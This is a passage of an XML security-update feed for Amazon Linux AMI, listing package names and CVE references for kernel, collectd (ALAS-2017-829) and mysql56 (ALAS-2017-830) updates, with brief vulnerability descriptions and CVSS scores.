</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2671" title="" id="CVE-2017-2671" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5967" title="" id="CVE-2017-5967" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7187" title="" id="CVE-2017-7187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7308" title="" id="CVE-2017-7308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7616" title="" id="CVE-2017-7616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7618" title="" id="CVE-2017-7618" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.27" release="14.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.27" release="14.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.27" release="14.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.27-14.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-829</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-829: medium priority package update for collectd</title><issued date="2017-05-18 18:58:00" /><updated date="2017-05-19 03:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7401:
collectd contains an infinite loop due to how the parse_packet() and parse_part_sign_sha256() functions interact. If an instance of collectd is configured with &quot;SecurityLevel None&quot; and with empty &quot;AuthFile&quot; options, an attacker can send crafted UDP packets that trigger the infinite loop, causing a denial of service.
1439674:
CVE-2017-7401 collectd: Infinite loop due to incorrect interaction of parse_packet() and parse_part_sign_sha256() functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7401" title="" id="CVE-2017-7401" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="collectd-memcachec" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-memcachec-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-curl_xml" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl_xml-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-bind" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-bind-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-lua" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lua-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-java" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-java-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-write_sensu" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_sensu-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-dns" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dns-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcollectdclient-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-apache" version="5.7.1" release="3.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-apache-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-ipmi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipmi-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-lvm" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lvm-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-chrony" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-chrony-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-mysql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mysql-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-nginx" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-nginx-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-netlink" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-netlink-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-varnish" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-varnish-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-amqp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-amqp-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-iptables" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-iptables-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="perl-Collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Collectd-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-drbd" version="5.7.1" release="3.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-drbd-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-python" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-python-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-generic-jmx" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-generic-jmx-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-email-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-postgresql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-postgresql-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-write_http" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_http-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-web" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-web-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-debuginfo" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-debuginfo-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-dbi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dbi-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-openldap" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-openldap-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdcached" version="5.7.1" release="3.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-rrdcached-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-notify_email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-notify_email-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient-devel" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcollectdclient-devel-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-zookeeper" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-zookeeper-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdtool-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-utils" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-utils-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-write_tsdb" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_tsdb-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-curl" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-ipvs" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipvs-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-hugepages" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-hugepages-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-gmond-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.7.1" release="3.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/collectd-rrdtool-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-memcachec" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-memcachec-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-rrdcached" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdcached-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-curl_xml" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl_xml-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-hugepages" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-hugepages-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-python" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-python-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="libcollectdclient" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/libcollectdclient-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-chrony" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-chrony-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-gmond" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-gmond-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-email-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-netlink" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-netlink-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-generic-jmx" version="5.7.1" release="3.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/collectd-generic-jmx-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-write_http" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_http-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-postgresql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-postgresql-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-amqp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-amqp-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-zookeeper" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-zookeeper-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-dns" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dns-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-apache" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-apache-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-dbi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dbi-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-lvm" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lvm-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-web" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-web-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-bind" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-bind-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-java" 
version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-java-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-varnish" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-varnish-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-iptables" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-iptables-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-debuginfo" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-debuginfo-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-write_sensu" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_sensu-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-write_tsdb" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_tsdb-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-snmp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-utils" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-utils-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-ipmi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipmi-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-curl" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-drbd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-drbd-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="libcollectdclient-devel" version="5.7.1" release="3.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/libcollectdclient-devel-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-nginx" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-nginx-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-notify_email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-notify_email-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-mysql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mysql-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="perl-Collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Collectd-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-lua" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lua-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-ipvs" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipvs-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-openldap" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-openldap-5.7.1-3.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-830</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-830: important priority package update for mysql56</title><issued date="2017-05-18 22:01:00" /><updated date="2017-05-19 03:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3599:
An integer overflow flaw leading to a buffer overflow was found in the way MySQL parsed connection handshake packets. An unauthenticated remote attacker with access to the MySQL port could use this flaw to crash the mysqld daemon.
1443386:
CVE-2017-3599 mysql: integer underflow in get_56_lenc_string() leading to DoS (CPU Apr 2017)
CVE-2017-3464:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1443379:
CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017)
CVE-2017-3463:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443378:
CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3462:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443377:
CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3461:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443376:
CVE-2017-3461 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3456:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443369:
CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3453:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1443365:
CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3450:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1443363:
CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017)
CVE-2017-3309:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443359:
CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3308:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443358:
CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3265:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Packaging). Supported versions that are affected are 5.5.53 and earlier, 5.6.34 and earlier and 5.7.16 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS v3.0 Base Score 5.6 (Confidentiality and Availability impacts).
1414423:
CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3265" title="" id="CVE-2017-3265" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3308" title="" id="CVE-2017-3308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3309" title="" id="CVE-2017-3309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3450" title="" id="CVE-2017-3450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3453" title="" id="CVE-2017-3453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3456" title="" id="CVE-2017-3456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3461" title="" id="CVE-2017-3461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3462" title="" id="CVE-2017-3462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3463" title="" id="CVE-2017-3463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3464" title="" id="CVE-2017-3464" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3599" title="" id="CVE-2017-3599" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-server" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.36" 
